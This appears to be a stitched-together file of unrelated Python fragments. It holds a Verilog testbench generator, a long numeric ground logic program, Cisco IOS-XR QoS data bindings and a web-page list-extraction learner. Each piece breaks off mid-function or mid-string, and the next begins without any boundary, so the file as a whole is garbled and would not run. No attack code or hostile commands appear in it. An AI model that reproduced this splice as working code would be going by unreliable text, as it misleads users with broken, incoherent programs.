description = {description}
'''
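# Note: the [[[{port_name}]]] blocks above appear to follow the nested-section
# syntax of the test configuration file; their fields are filled from 'spec' below.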
testcfg = ''
spec.update({'port_name': port_name, 'description': Pin.description(port_name)})
if is_digital:
spec.update({'bit_width': Pin.vectorsize(port_name)})
testcfg += template.format(**spec)
return testcfg
@classmethod
def declare_optional_analog_pins(cls, exclude=[]):
'''
Do class.declare_optional_pins_prime for optional analog pins
'''
testcfg = ''
for p in list(set(Pin.list_optional_analog())-set(exclude)):
testcfg += cls.declare_optional_pins_prime(p, False)
return testcfg
@classmethod
def declare_optional_digital_pins(cls, exclude=[]):
'''
Do class.declare_optional_pins_prime for optional digital pins
'''
testcfg = ''
for p in list(set(Pin.list_optional_digital())-set(exclude)):
testcfg += cls.declare_optional_pins_prime(p, True)
return testcfg
@classmethod
def declare_optional_pins(cls, exclude=[]):
'''
Do class.declare_optional_pins_prime for optional analog and digital pins
'''
testcfg = cls.declare_optional_analog_pins(exclude)
testcfg += cls.declare_optional_digital_pins(exclude)
return testcfg
class Testbench(object):
@classmethod
def instantiate_bitvector(cls, signame, bitwidth, value=''):
'''
Instantiate bitvector
bitvector #(.bit_width({bitwidth}), .value(@{signame})) xbv_{signame} (.out({signame}));
'''
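# Illustrative expansion for a hypothetical 4-bit pin 'ctl'
# (assuming Pin.vectorsize('ctl') == 4):
#   bitvector #(.bit_width(4), .value(@(ctl))) xbv_ctl (.out(ctl[3:0]));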
if value == '':
value = '@(%s)' % signame
return 'bitvector #(.bit_width({bitwidth}), .value({value})) xbv_{signame} (.out({signame}{bus}));'.format(signame=signame, bitwidth=bitwidth, value=value, bus='[%d:0]' % (Pin.vectorsize(signame)-1) if Pin.vectorsize(signame)>1 else '')
@classmethod
def instantiate_bitvector_optional_pins(cls, exclude=[]):
'''
Do cls.instantiate_bitvector() for all optional digital pins
'''
return '\\n'.join([cls.instantiate_bitvector(p, Pin.vectorsize(p)) for p in Pin.list_optional_digital() if p not in exclude])
@classmethod
def instantiate_vdc(cls, signame, value=''):
'''
Instantiate vdc
For example, instantiate_vdc('vin') will produce
vdc #(.dc(@(vin))) xvdc_vin (.vout(vin));
'''
if value == '':
value = '@(%s)' % signame
return 'vdc #(.dc({value})) xvdc_{signame} (.vout({signame}));'.format(signame=signame, value=value)
@classmethod
def instantiate_vdc_optional_pins(cls, exclude=[]):
'''
Do cls.instantiate_vdc() for all optional analog voltage pins
'''
return '\\n'.join([cls.instantiate_vdc(p) for p in list(set(Pin.list_optional_analog_voltage()) - set(exclude))])
@classmethod
def instantiate_idc(cls, signame, pnode, nnode, value=''):
'''
Instantiate idc which produces signame
For example, instantiate_idc('iin', 'vdd', 'iin') will produce
idc #(.is_n(1), .dc(@(iin))) xidc_iin (.outnode(iin), .refnode(vdd));
'''
if value == '':
value = '@(%s)' % signame
return 'idc #(.is_n({direction}), .dc({value})) xidc_{signame} (.outnode({outnode}), .refnode({refnode}));'.format(signame=signame, outnode=signame, refnode=pnode if signame==nnode else nnode if signame==pnode else 'ERROR', direction = '0' if signame==pnode else '1' if signame==nnode else 'ERROR', value=value)
@classmethod
def instantiate_idc_optional_pins(cls, prefnode='vdd', nrefnode='gnd', exclude=[]):
'''
Do cls.instantiate_idc() for all optional analog current pins
'''
return '\\n'.join([cls.instantiate_idc(p, p if Pin.current_direction(p)=='n' else prefnode, p if Pin.current_direction(p)=='p' else nrefnode ) for p in Pin.list_optional_analog_current() if p not in exclude])
@classmethod
def instantiate_idc_on_pin(cls, signame, prefnode='vdd', nrefnode='gnd'):
'''
Do cls.instantiate_idc() for a single analog current pin (signame)
'''
p = signame
return cls.instantiate_idc(p, p if Pin.current_direction(p)=='n' else prefnode, p if Pin.current_direction(p)=='p' else nrefnode)
@classmethod
def dut(cls): # device-under-test
return Test.dut()
@classmethod
def map_by_name(cls, p): # map a pin by name in Verilog
if Pin.vectorsize(p) > 1:
return '.%s(%s%s)' % (Pin.name(p),p,print_bus(Pin.vectorsize(p)))
else:
return '.%s(%s)' % (Pin.name(p),p)
@classmethod
def dut_map_by_name(cls):
# repository: bernardocuteri/wasp
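# The numeric block below appears to be a ground ASP program in the
# lparse/smodels intermediate format: each '1 <head> <#lits> <#neg> <lits...>'
# line is a basic rule, so '1 2 0 0' is a fact and '1 335 2 1 336 337' is a
# rule with head 335 and body 'not 336, 337'.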
input = """
1 2 0 0
1 3 0 0
1 4 0 0
1 5 0 0
1 6 0 0
1 7 0 0
1 8 0 0
1 9 0 0
1 10 0 0
1 11 0 0
1 12 0 0
1 13 0 0
1 14 0 0
1 15 0 0
1 16 0 0
1 17 0 0
1 18 0 0
1 19 0 0
1 20 0 0
1 21 0 0
1 22 0 0
1 23 0 0
1 24 0 0
1 25 0 0
1 26 0 0
1 27 0 0
1 28 0 0
1 29 0 0
1 30 0 0
1 31 0 0
1 32 0 0
1 33 0 0
1 34 0 0
1 35 0 0
1 36 0 0
1 37 0 0
1 38 0 0
1 39 0 0
1 40 0 0
1 41 0 0
1 42 0 0
1 43 0 0
1 44 0 0
1 45 0 0
1 46 0 0
1 47 0 0
1 48 0 0
1 49 0 0
1 50 0 0
1 51 0 0
1 52 0 0
1 53 0 0
1 54 0 0
1 55 0 0
1 56 0 0
1 57 0 0
1 58 0 0
1 59 0 0
1 60 0 0
1 61 0 0
1 62 0 0
1 63 0 0
1 64 0 0
1 65 0 0
1 66 0 0
1 67 0 0
1 68 0 0
1 69 0 0
1 70 0 0
1 71 0 0
1 72 0 0
1 73 0 0
1 74 0 0
1 75 0 0
1 76 0 0
1 77 0 0
1 78 0 0
1 79 0 0
1 80 0 0
1 81 0 0
1 82 0 0
1 83 0 0
1 84 0 0
1 85 0 0
1 86 0 0
1 87 0 0
1 88 0 0
1 89 0 0
1 90 0 0
1 91 0 0
1 92 0 0
1 93 0 0
1 94 0 0
1 95 0 0
1 96 0 0
1 97 0 0
1 98 0 0
1 99 0 0
1 100 0 0
1 101 0 0
1 102 0 0
1 103 0 0
1 104 0 0
1 105 0 0
1 106 0 0
1 107 0 0
1 108 0 0
1 109 0 0
1 110 0 0
1 111 0 0
1 112 0 0
1 113 0 0
1 114 0 0
1 115 0 0
1 116 0 0
1 117 0 0
1 118 0 0
1 119 0 0
1 120 0 0
1 121 0 0
1 122 0 0
1 123 0 0
1 124 0 0
1 125 0 0
1 126 0 0
1 127 0 0
1 128 0 0
1 129 0 0
1 130 0 0
1 131 0 0
1 132 0 0
1 133 0 0
1 134 0 0
1 135 0 0
1 136 0 0
1 137 0 0
1 138 0 0
1 139 0 0
1 140 0 0
1 141 0 0
1 142 0 0
1 143 0 0
1 144 0 0
1 145 0 0
1 146 0 0
1 147 0 0
1 148 0 0
1 149 0 0
1 150 0 0
1 151 0 0
1 152 0 0
1 153 0 0
1 154 0 0
1 155 0 0
1 156 0 0
1 157 0 0
1 158 0 0
1 159 0 0
1 160 0 0
1 161 0 0
1 162 0 0
1 163 0 0
1 164 0 0
1 165 0 0
1 166 0 0
1 167 0 0
1 168 0 0
1 169 0 0
1 170 0 0
1 171 0 0
1 172 0 0
1 173 0 0
1 174 0 0
1 175 0 0
1 176 0 0
1 177 0 0
1 178 0 0
1 179 0 0
1 180 0 0
1 181 0 0
1 182 0 0
1 183 0 0
1 184 0 0
1 185 0 0
1 186 0 0
1 187 0 0
1 188 0 0
1 189 0 0
1 190 0 0
1 191 0 0
1 192 0 0
1 193 0 0
1 194 0 0
1 195 0 0
1 196 0 0
1 197 0 0
1 198 0 0
1 199 0 0
1 200 0 0
1 201 0 0
1 202 0 0
1 203 0 0
1 204 0 0
1 205 0 0
1 206 0 0
1 207 0 0
1 208 0 0
1 209 0 0
1 210 0 0
1 211 0 0
1 212 0 0
1 213 0 0
1 214 0 0
1 215 0 0
1 216 0 0
1 217 0 0
1 218 0 0
1 219 0 0
1 220 0 0
1 221 0 0
1 222 0 0
1 223 0 0
1 224 0 0
1 225 0 0
1 226 0 0
1 227 0 0
1 228 0 0
1 229 0 0
1 230 0 0
1 231 0 0
1 232 0 0
1 233 0 0
1 234 0 0
1 235 0 0
1 236 0 0
1 237 0 0
1 238 0 0
1 239 0 0
1 240 0 0
1 241 0 0
1 242 0 0
1 243 0 0
1 244 0 0
1 245 0 0
1 246 0 0
1 247 0 0
1 248 0 0
1 249 0 0
1 250 0 0
1 251 0 0
1 252 0 0
1 253 0 0
1 254 0 0
1 255 0 0
1 256 0 0
1 257 0 0
1 258 0 0
1 259 0 0
1 260 0 0
1 261 0 0
1 262 0 0
1 263 0 0
1 264 0 0
1 265 0 0
1 266 0 0
1 267 0 0
1 268 0 0
1 269 0 0
1 270 0 0
1 271 0 0
1 272 0 0
1 273 0 0
1 274 0 0
1 275 0 0
1 276 0 0
1 277 0 0
1 278 0 0
1 279 0 0
1 280 0 0
1 281 0 0
1 282 0 0
1 283 0 0
1 284 0 0
1 285 0 0
1 286 0 0
1 287 0 0
1 288 0 0
1 289 0 0
1 290 0 0
1 291 0 0
1 292 0 0
1 293 0 0
1 294 0 0
1 295 0 0
1 296 0 0
1 297 0 0
1 298 0 0
1 299 0 0
1 300 0 0
1 301 0 0
1 302 0 0
1 303 0 0
1 304 0 0
1 305 0 0
1 306 0 0
1 307 0 0
1 308 0 0
1 309 0 0
1 310 0 0
1 311 0 0
1 312 0 0
1 313 0 0
1 314 0 0
1 315 0 0
1 316 0 0
1 317 0 0
1 318 0 0
1 319 0 0
1 320 0 0
1 321 0 0
1 322 0 0
1 323 0 0
1 324 0 0
1 325 0 0
1 326 0 0
1 327 0 0
1 328 0 0
1 329 0 0
1 330 0 0
1 331 0 0
1 332 0 0
1 333 0 0
1 334 0 0
1 335 2 1 336 337
1 336 2 1 335 337
1 337 0 0
1 338 2 1 339 340
1 339 2 1 338 340
1 340 0 0
1 341 2 1 342 343
1 342 2 1 341 343
1 343 0 0
1 344 2 1 345 346
1 345 2 1 344 346
1 346 0 0
1 347 2 1 348 349
1 348 2 1 347 349
1 349 0 0
1 350 2 1 351 352
1 351 2 1 350 352
1 352 0 0
1 353 2 1 354 355
1 354 2 1 353 355
1 355 0 0
1 356 2 1 357 358
1 357 2 1 356 358
1 358 0 0
1 359 2 1 360 361
1 360 2 1 359 361
1 361 0 0
1 362 2 1 363 364
1 363 2 1 362 364
1 364 0 0
1 365 2 1 366 367
1 366 2 1 365 367
1 367 0 0
1 368 2 1 369 370
1 369 2 1 368 370
1 370 0 0
1 371 2 1 372 373
1 372 2 1 371 373
1 373 0 0
1 374 2 1 375 376
1 375 2 1 374 376
1 376 0 0
1 377 2 1 378 379
1 378 2 1 377 379
1 379 0 0
1 380 2 1 381 382
1 381 2 1 380 382
1 382 0 0
1 383 2 1 384 385
1 384 2 1 383 385
1 385 0 0
1 386 2 1 387 388
1 387 2 1 386 388
1 388 0 0
1 389 2 1 390 391
1 390 2 1 389 391
1 391 0 0
1 392 2 1 393 394
1 393 2 1 392 394
1 394 0 0
1 395 2 1 396 397
1 396 2 1 395 397
1 397 0 0
1 398 2 1 399 400
1
""" Cisco_IOS_XR_skp_qos_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR skp\-qos package operational data.
This module contains definitions
for the following management objects\:
platform\-qos\: QoS Skywarp platform operational data
platform\-qos\-ea\: platform qos ea
Copyright (c) 2013\-2017 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Action(Enum):
"""
Action (Enum Class)
Action type
.. data:: police_transmit = 0
Police action transmit
.. data:: police_set_transmit = 1
Police action set transmit
.. data:: police_drop = 2
Police action drop
.. data:: police_unknown = 3
Police action unknown
"""
police_transmit = Enum.YLeaf(0, "police-transmit")
police_set_transmit = Enum.YLeaf(1, "police-set-transmit")
police_drop = Enum.YLeaf(2, "police-drop")
police_unknown = Enum.YLeaf(3, "police-unknown")
class ActionOpcode(Enum):
"""
ActionOpcode (Enum Class)
Action opcode
.. data:: precedence = 0
Precedence
.. data:: dscp = 1
DSCP
.. data:: discard_class = 2
Discard class
.. data:: qos_group = 3
QoS group
.. data:: cos_inner = 4
COS inner
.. data:: cos = 5
COS
.. data:: exp_top = 6
EXP top
.. data:: exp_imp = 7
EXP IMP
.. data:: tunnel_precedence = 8
Tunnel precedence
.. data:: tunnel_dscp = 9
Tunnel DSCP
.. data:: itag_dei = 10
ITAG DEI
.. data:: itag_cos = 11
ITAG COS
.. data:: cos_imposition = 12
COS imposition
.. data:: dei_imposition = 13
DEI imposition
.. data:: dei = 14
DEI
.. data:: no_marking = 15
No marking
"""
precedence = Enum.YLeaf(0, "precedence")
dscp = Enum.YLeaf(1, "dscp")
discard_class = Enum.YLeaf(2, "discard-class")
qos_group = Enum.YLeaf(3, "qos-group")
cos_inner = Enum.YLeaf(4, "cos-inner")
cos = Enum.YLeaf(5, "cos")
exp_top = Enum.YLeaf(6, "exp-top")
exp_imp = Enum.YLeaf(7, "exp-imp")
tunnel_precedence = Enum.YLeaf(8, "tunnel-precedence")
tunnel_dscp = Enum.YLeaf(9, "tunnel-dscp")
itag_dei = Enum.YLeaf(10, "itag-dei")
itag_cos = Enum.YLeaf(11, "itag-cos")
cos_imposition = Enum.YLeaf(12, "cos-imposition")
dei_imposition = Enum.YLeaf(13, "dei-imposition")
dei = Enum.YLeaf(14, "dei")
no_marking = Enum.YLeaf(15, "no-marking")
class CacState(Enum):
"""
CacState (Enum Class)
CAC/UBRL class states
.. data:: unknown = 0
unknown
.. data:: admit = 1
admit
.. data:: redirect = 2
redirect
.. data:: ubrl = 3
ubrl
"""
unknown = Enum.YLeaf(0, "unknown")
admit = Enum.YLeaf(1, "admit")
redirect = Enum.YLeaf(2, "redirect")
ubrl = Enum.YLeaf(3, "ubrl")
class PolicyParamUnit(Enum):
"""
PolicyParamUnit (Enum Class)
Policy param unit
.. data:: policy_param_unit_invalid = 0
policy param unit invalid
.. data:: policy_param_unit_bytes = 1
policy param unit bytes
.. data:: policy_param_unit_kbytes = 2
policy param unit kbytes
.. data:: policy_param_unit_mbytes = 3
policy param unit mbytes
.. data:: policy_param_unit_gbytes = 4
policy param unit gbytes
.. data:: policy_param_unit_bitsps = 5
policy param unit bitsps
.. data:: policy_param_unit_kbitsps = 6
policy param unit kbitsps
.. data:: policy_param_unit_mbitsps = 7
policy param unit mbitsps
.. data:: policy_param_unit_gbitsps = 8
policy param unit gbitsps
.. data:: policy_param_unit_cells_ps = 9
policy param unit cells ps
.. data:: policy_param_unit_packets_ps = 10
policy param unit packets ps
.. data:: policy_param_unit_us = 11
policy param unit us
.. data:: policy_param_unit_ms = 12
policy param unit ms
.. data:: policy_param_unit_seconds = 13
policy param unit seconds
.. data:: policy_param_unit_packets = 14
policy param unit packets
.. data:: policy_param_unit_cells = 15
policy param unit cells
.. data:: policy_param_unit_percent = 16
policy param unit percent
.. data:: policy_param_unit_per_thousand = 17
policy param unit per thousand
.. data:: policy_param_unit_per_million = 18
policy param unit per million
.. data:: policy_param_unit_hz = 19
policy param unit hz
.. data:: policy_param_unit_khz = 20
policy param unit khz
.. data:: policy_param_unit_mhz = 21
policy param unit mhz
.. data:: policy_param_unit_ratio = 22
policy param unit ratio
.. data:: policy_param_unit_max = 23
policy param unit max
"""
policy_param_unit_invalid = Enum.YLeaf(0, "policy-param-unit-invalid")
policy_param_unit_bytes = Enum.YLeaf(1, "policy-param-unit-bytes")
policy_param_unit_kbytes = Enum.YLeaf(2, "policy-param-unit-kbytes")
policy_param_unit_mbytes = Enum.YLeaf(3, "policy-param-unit-mbytes")
policy_param_unit_gbytes = Enum.YLeaf(4, "policy-param-unit-gbytes")
policy_param_unit_bitsps = Enum.YLeaf(5, "policy-param-unit-bitsps")
policy_param_unit_kbitsps = Enum.YLeaf(6, "policy-param-unit-kbitsps")
policy_param_unit_mbitsps = Enum.YLeaf(7, "policy-param-unit-mbitsps")
policy_param_unit_gbitsps = Enum.YLeaf(8, "policy-param-unit-gbitsps")
policy_param_unit_cells_ps = Enum.YLeaf(9, "policy-param-unit-cells-ps")
policy_param_unit_packets_ps = Enum.YLeaf(10, "policy-param-unit-packets-ps")
policy_param_unit_us = Enum.YLeaf(11, "policy-param-unit-us")
policy_param_unit_ms = Enum.YLeaf(12, "policy-param-unit-ms")
policy_param_unit_seconds = Enum.YLeaf(13, "policy-param-unit-seconds")
policy_param_unit_packets = Enum.YLeaf(14, "policy-param-unit-packets")
policy_param_unit_cells = Enum.YLeaf(15, "policy-param-unit-cells")
policy_param_unit_percent = Enum.YLeaf(16, "policy-param-unit-percent")
policy_param_unit_per_thousand = Enum.YLeaf(17, "policy-param-unit-per-thousand")
policy_param_unit_per_million = Enum.YLeaf(18, "policy-param-unit-per-million")
policy_param_unit_hz = Enum.YLeaf(19, "policy-param-unit-hz")
policy_param_unit_khz = Enum.YLeaf(20, "policy-param-unit-khz")
policy_param_unit_mhz = Enum.YLeaf(21, "policy-param-unit-mhz")
policy_param_unit_ratio = Enum.YLeaf(22, "policy-param-unit-ratio")
policy_param_unit_max = Enum.YLeaf(23, "policy-param-unit-max")
class PolicyState(Enum):
"""
PolicyState (Enum Class)
Different Interface states
.. data:: active = 0
active
.. data:: suspended = 1
suspended
"""
active = Enum.YLeaf(0, "active")
suspended = Enum.YLeaf(1, "suspended")
class QosUnit(Enum):
"""
QosUnit (Enum Class)
QoS parameter unit
.. data:: invalid = 0
Invalid type
.. data:: bytes = 1
Bytes
.. data:: kilobytes = 2
Kilobytes
.. data:: megabytes = 3
Megabytes
.. data:: gigabytes = 4
Gigabytes
.. data:: bps = 5
Bits per second
.. data:: kbps = 6
Kilo bits per second
.. data:: mbps = 7
Mega bits per second
.. data:: gbps = 8
Giga bits per second
.. data:: cells_per_second = 9
Cells per second
.. data:: packets_per_second = 10
Packets per second
.. data:: microsecond = 11
Microsecond
.. data:: millisecond = 12
Millisecond
.. data:: packets = 13
Number of packets
.. data:: cells = 14
Number of cells
.. data:: percentage = 15
Percentage
.. data:: ratio = 16
Ratio
"""
invalid = Enum.YLeaf(0, "invalid")
bytes = Enum.YLeaf(1, "bytes")
kilobytes = Enum.YLeaf(2, "kilobytes")
megabytes = Enum.YLeaf(3, "megabytes")
gigabytes = Enum.YLeaf(4, "gigabytes")
bps = Enum.YLeaf(5, "bps")
kbps = Enum.YLeaf(6, "kbps")
mbps = Enum.YLeaf(7, "mbps")
gbps = Enum.YLeaf(8, "gbps")
cells_per_second = Enum.YLeaf(9, "cells-per-second")
packets_per_second = Enum.YLeaf(10, "packets-per-second")
microsecond = Enum.YLeaf(11, "microsecond")
millisecond = Enum.YLeaf(12, "millisecond")
packets = Enum.YLeaf(13, "packets")
cells = Enum.YLeaf(14, "cells")
percentage = Enum.YLeaf(15, "percentage")
ratio = Enum.YLeaf(16, "ratio")
class TbAlgorithm(Enum):
"""
TbAlgorithm (Enum Class)
Tokenbucket type
.. data:: inactive = 0
Inactive, configured but disabled
.. data:: single = 1
Single token bucket
.. data:: single_rate_tcm = 2
Single rate three color marker
.. data:: two_rate_tcm = 3
Two rate three color marker
.. data:: mef_tcm = 4
Allows coupling between CIR and PIR tb's
.. data:: dummy = 5
Internal dummy token bucket for coupled-policer
child
"""
inactive = Enum.YLeaf(0, "inactive")
single = Enum.YLeaf(1, "single")
single_rate_tcm = Enum.YLeaf(2, "single-rate-tcm")
two_rate_tcm = Enum.YLeaf(3, "two-rate-tcm")
mef_tcm = Enum.YLeaf(4, "mef-tcm")
dummy = Enum.YLeaf(5, "dummy")
class Wred(Enum):
"""
Wred (Enum Class)
Wred
.. data:: wred_cos_cmd = 0
wred cos cmd
.. data:: wred_dscp_cmd = 1
wred dscp cmd
.. data:: wred_precedence_cmd = 2
wred precedence cmd
.. data:: wred_discard_class_cmd = 3
wred discard class cmd
.. data:: wred_mpls_exp_cmd = 4
wred mpls exp cmd
.. data:: red_with_user_min_max = 5
red with user min max
.. data:: red_with_default_min_max = 6
red with default min max
.. data:: wred_dei_cmd = 7
wred dei cmd
.. data:: wred_ecn_cmd = 8
wred ecn cmd
.. data:: wred_invalid_cmd = 9
wred invalid cmd
"""
wred_cos_cmd = Enum.YLeaf(0, "wred-cos-cmd")
wred_dscp_cmd = Enum.YLeaf(1, "wred-dscp-cmd")
wred_precedence_cmd = Enum.YLeaf(2, "wred-precedence-cmd")
wred_discard_class_cmd = Enum.YLeaf(3, "wred-discard-class-cmd")
wred_mpls_exp_cmd = Enum.YLeaf(4, "wred-mpls-exp-cmd")
red_with_user_min_max = Enum.YLeaf(5, "red-with-user-min-max")
red_with_default_min_max = Enum.YLeaf(6, "red-with-default-min-max")
wred_dei_cmd = Enum.YLeaf(7, "wred-dei-cmd")
wred_ecn_cmd = Enum.YLeaf(8, "wred-ecn-cmd")
wred_invalid_cmd = Enum.YLeaf(9, "wred-invalid-cmd")
class PlatformQos(Entity):
"""
QoS Skywarp platform operational data
.. attribute:: nodes
List of nodes with platform specific QoS configuration
**type**\: :py:class:`Nodes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_skp_qos_oper.PlatformQos.Nodes>`
"""
_prefix = 'skp-qos-oper'
_revision = '2016-02-18'
def __init__(self):
super(PlatformQos, self).__init__()
self._top_entity = None
self.yang_name = "platform-qos"
self.yang_parent_name = "Cisco-IOS-XR-skp-qos-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("nodes", ("nodes", PlatformQos.Nodes))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.nodes = PlatformQos.Nodes()
self.nodes.parent = self
self._children_name_map["nodes"] = "nodes"
self._children_yang_names.add("nodes")
self._segment_path = lambda: "Cisco-IOS-XR-skp-qos-oper:platform-qos"
class Nodes(Entity):
"""
List of nodes with platform specific QoS
configuration
.. attribute:: node
Node with platform specific QoS configuration
**type**\: list of :py:class:`Node <ydk.models.cisco_ios_xr.Cisco_IOS_XR_skp_qos_oper.PlatformQos.Nodes.Node>`
"""
_prefix = 'skp-qos-oper'
_revision = '2016-02-18'
def __init__(self):
super(PlatformQos.Nodes, self).__init__()
self.yang_name = "nodes"
self.yang_parent_name = "platform-qos"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("node", ("node", PlatformQos.Nodes.Node))])
# landmarkrest/util/TreeListLearner.py
import re
import json
import sys
from PageManager import PageManager
from Tree import Tree
import time
import TreeNode
import math
import itertools
void_tags = frozenset(['area', 'base', 'br', 'col', 'command', 'embed', 'hr', 'img', 'input', 'keygen', 'link', 'meta',
'param', 'source', 'track', 'wbr'])
class TreeListLearner(object):
def __init__(self):
self.__minEdgeWeight = 2
self.__DEBUG = False
@staticmethod
def cluster_slot(pg, intervals):
structs = pg.getVisibleTokenStructure(data_as_strings=False, data_as_tokens=True)
sorted_structs = {}
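# Each interval is assumed to be a (start_token_loc, end_token_loc, page_id)
# tuple; the membership test below keeps only visible chunks that overlap it.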
for interval in intervals:
sorted_structs[interval] = []
tree = Tree()
forward_tree = Tree()
for struct in structs:
first_vis_token_loc = struct['visible_token_buffer'][0].token_location
last_vis_token_loc = struct['visible_token_buffer'][-1].token_location
for interval in intervals:
if interval[2] == struct['page_id'] and last_vis_token_loc >= interval[0] and first_vis_token_loc < interval[1]:
visible_tokens = [a.token for a in struct['visible_token_buffer']]
visible_text = ''.join(visible_tokens)
# find html tags leading up to the current visible chunk
potential_toks = re.findall(r'(</?[\w\-]+.*?>)', ''.join(struct['invisible_token_buffer_before']))
tokens_for_path = []
# remove all attributes, other than class, from the html tags
for tok in potential_toks:
tokens_for_path.append(re.sub(r'\s(?!class=)[a-z\-_]+=(?:(?:\'.*?\')|(?:".*?"))', '', tok))
meta_struct = {
'visible_text': visible_text,
'first_vis_token_loc': first_vis_token_loc,
'last_vis_token_loc': last_vis_token_loc,
'page_id': struct['page_id'],
'clusters': set(),
'path': '<BRK>'.join(tokens_for_path),
'tags': list(tokens_for_path)
}
# add list of html tags, and list of visible tokens to trees
tokens_for_path.reverse()
tree.add_node_set(tokens_for_path, meta_struct)
forward_tree.add_node_set(visible_tokens, meta_struct)
sorted_structs[interval].append(meta_struct)
break
count = tree.cluster_meta_data()
forward_tree.cluster_meta_data(count)
#if len(intervals) == 10:
# print '\n\ncluster all'
# for interval in sorted_structs:
# print '\n'
# for meta in sorted_structs[interval]:
# print meta['visible_text']
#for page_id in sorted_structs:
# for meta in sorted_structs[page_id]:
# print '{:30}'.format(", ".join(sorted(meta['clusters'], key=lambda x: x.rjust(3,'0')))[:30]) + \
# " : " + '{:30}'.format(meta['path'][-30:]) + " : " + meta['visible_text'][:20]
# print ''
# break
clusters = TreeListLearner.cluster_all(sorted_structs)
#if len(intervals) == 10:
# print '\n\nclusters'
# for cluster in clusters:
# print '\ncluster'
# for interval in cluster:
# print ''
# for meta in sorted_structs[interval]:
# print meta['visible_text']
return clusters
@staticmethod
def cluster_all(structs):
labels = set()
for interval in structs:
for meta in structs[interval]:
labels.update(meta['clusters'])
best_cluster = {}
most_predictions = 0
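# Greedy selection: for each candidate label, gather the intervals containing it,
# keep only the (label -> count) predictions that are identical across all of those
# intervals, and score the candidate as len(predictions) * len(cluster).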
for marker in labels:
predictions = None
cluster = {}
for interval in filter(lambda x: any([marker in meta['clusters'] for meta in structs[x]]), structs.keys()):
cluster[interval] = interval
for interval in cluster:
counts = {}
for meta in structs[interval]:
for label in meta['clusters']:
if label in counts:
counts[label] += 1
else:
counts[label] = 1
if predictions is None:
predictions = counts
else:
to_remove = []
for prediction in predictions:
if prediction not in counts or predictions[prediction] != counts[prediction]:
to_remove.append(prediction)
for word in to_remove:
del predictions[word]
if len(predictions) * len(cluster) > most_predictions:
most_predictions = len(predictions) * len(cluster)
best_cluster = cluster
if len(best_cluster) == 0:
for interval in structs:
best_cluster[interval] = interval
clusters = [best_cluster]
remaining = {}
for interval in structs:
if interval not in best_cluster:
remaining[interval] = structs[interval]
if len(remaining) > 0:
clusters.extend(TreeListLearner.cluster_all(remaining))
return clusters
@staticmethod
def find_lists(pg):
lists = {}
for page_id in pg.get_pages():
lists[page_id] = {}
all_slot_structs = [pg.getVisibleTokenStructure(data_as_strings=False, data_as_tokens=True)]
list_num = 0
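# all_slot_structs acts as a worklist: when a list is found, the slots before and
# after it are appended (see below) so those regions get re-scanned for more lists.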
for slot_structs in all_slot_structs:
tree = Tree()
forward_tree = Tree()
metas = dict()
for page_id in pg.get_pages():
metas[page_id] = []
for struct in slot_structs:
visible_tokens = [a.token for a in struct['visible_token_buffer']]
visible_text = ''.join(visible_tokens)
first_vis_token_loc = struct['visible_token_buffer'][0].token_location
last_vis_token_loc = struct['visible_token_buffer'][-1].token_location
#find html tags leading up to the current visible chunk
potential_toks = re.findall(r'(</?[\w\-]+.*?>)', ''.join(struct['invisible_token_buffer_before']))
tokens_for_path = []
#remove all attributes, other than class, from the html tags
for tok in potential_toks:
tokens_for_path.append(re.sub(r'\s(?!class=)[a-z\-_]+=(?:(?:\'.*?\')|(?:".*?"))', '', tok))
meta_struct = {
'visible_text': visible_text,
'first_vis_token_loc': first_vis_token_loc,
'last_vis_token_loc': last_vis_token_loc,
'page_id': struct['page_id'],
'clusters': set(),
'path': '<BRK>'.join(tokens_for_path),
'tags': list(tokens_for_path)
}
#add list of html tags, and list of visible tokens to trees
tokens_for_path.reverse()
tree.add_node_set(tokens_for_path, meta_struct)
forward_tree.add_node_set(visible_tokens, meta_struct)
metas[meta_struct['page_id']].append(meta_struct)
# print 'START TREE DISPLAY'
# tree.display()
# print 'END TREE DISPLAY'
#add clusters to meta structures based on their positions in the trees
count = tree.cluster_meta_data()
forward_tree.cluster_meta_data(count)
#sort meta structures by position on pages
spans = []
for page_id in metas:
metas[page_id] = sorted(metas[page_id], key=lambda x: x['first_vis_token_loc'])
span = []
for meta in metas[page_id]:
span.append(meta['clusters'])
spans.append(span)
row_marker = TreeListLearner.find_row_marker(spans)
#for page_id in metas:
# for meta in metas[page_id]:
# print '{:30}'.format(", ".join(sorted(meta['clusters'], key=lambda x: x.rjust(3,'0')))[:30]) + \
# " : " + '{:30}'.format(meta['path'][-30:]) + " : " + meta['visible_text'][:20]
# print ''
# break
if row_marker:
#print row_marker
list_id = 'list_' + str(list_num)
in_template = TreeListLearner.list_location(row_marker, metas, pg.get_pages(), lists, list_id)
#also look for lists in the spaces before and after this list
all_slot_structs.append(filter(
lambda x: x['visible_token_buffer'][-1].token_location < lists[x['page_id']][list_id][
'starting_token_location'], slot_structs))
all_slot_structs.append(filter(
lambda x: x['visible_token_buffer'][0].token_location >= lists[x['page_id']][list_id][
'ending_token_location'], slot_structs))
if in_template:
for page_id in lists:
del lists[page_id][list_id]
else:
list_num += 1
return lists
@staticmethod
def list_location(row_marker, metas, pages, lists, list_id):
#print row_marker
template_list = True
visible_string = None
for page in metas:
visible_list = []
first_elems = [None]
marker = None
window = []
first_depth = None
last_depth = None
first_index = None
last_index = None
#find the highest level in the DOM between each pair of row markers and split the rows there
for num, meta in enumerate(metas[page]):
window.append(meta)
if row_marker in meta['clusters']:
if marker:
visible_list.extend(window)
marker = meta
depth = 0
split_elem = marker
shallowest = 0
for elem in window:
for tag in elem['tags']:
match = re.search(r'<(/?)([\w\-]+).*?(/?)>', tag)
if match.group(2) not in void_tags and not match.group(3):
if match.group(1):
depth -= 1
if depth < shallowest:
shallowest = depth
split_elem = elem
else:
depth += 1
if first_depth is None:
first_depth = shallowest
last_depth = shallowest - depth
last_index = num
first_elems.append(split_elem)
else:
first_index = num
marker = meta
window = []
if visible_string is None:
